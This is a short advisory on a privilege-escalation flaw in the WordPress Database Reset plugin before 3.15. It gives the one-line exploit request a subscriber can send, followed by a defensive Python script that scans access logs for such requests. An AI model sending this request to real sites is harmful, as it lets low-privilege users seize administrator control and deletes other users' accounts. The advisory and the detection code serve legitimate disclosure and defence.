This flaw “allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.”
Log in as a subscriber, then send the following request: URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111
CPE

Name | Operator | Version |
---|---|---|
wordpress-database-reset | lt | 3.15 |
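To check whether a site running a version below 3.15 received a request of the shape shown above, the web server access log can be searched for the reset parameters. The following is an added example, not code from the plugin or the advisory; it assumes Combined Log Format, sees only parameters sent in the query string as in the request above, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_reset_requests(lines):
    """Return one dict per log line that carries the plugin's reset parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes names, so db-reset-tables%5B%5D and
        # db-reset-tables[] both come out as "db-reset-tables[]".
        params = parse_qs(url.query, keep_blank_values=True)
        tables = [t for name, vals in params.items()
                  if name.lower().startswith("db-reset-tables") for t in vals]
        if not tables:
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "status": int(m.group("status")),
            "tables": tables,
            # A reset of the users table is the privilege-escalation case.
            "users_table": any(t.lower().endswith("users") for t in tables),
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2020:09:14:02 +0000] "GET /wp-admin/admin.php?page=settings HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2020:09:15:40 +0000] "GET /wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111 HTTP/1.1" 302 0',
    '203.0.113.9 - - [10/Jan/2020:09:16:01 +0000] "GET /wp-admin/admin.php?db-reset-tables[]=comments&db-reset-code=22222&db-reset-code-confirm=22222 HTTP/1.1" 302 0',
    '198.51.100.7 - - [10/Jan/2020:09:17:30 +0000] "GET /index.php?s=db-reset-tables HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for hit in find_reset_requests(SAMPLE_LOG):
        print(hit)
```

Any hit with `users_table` set should be followed by a review of the site's administrator accounts, and the plugin should be updated to 3.15 or later.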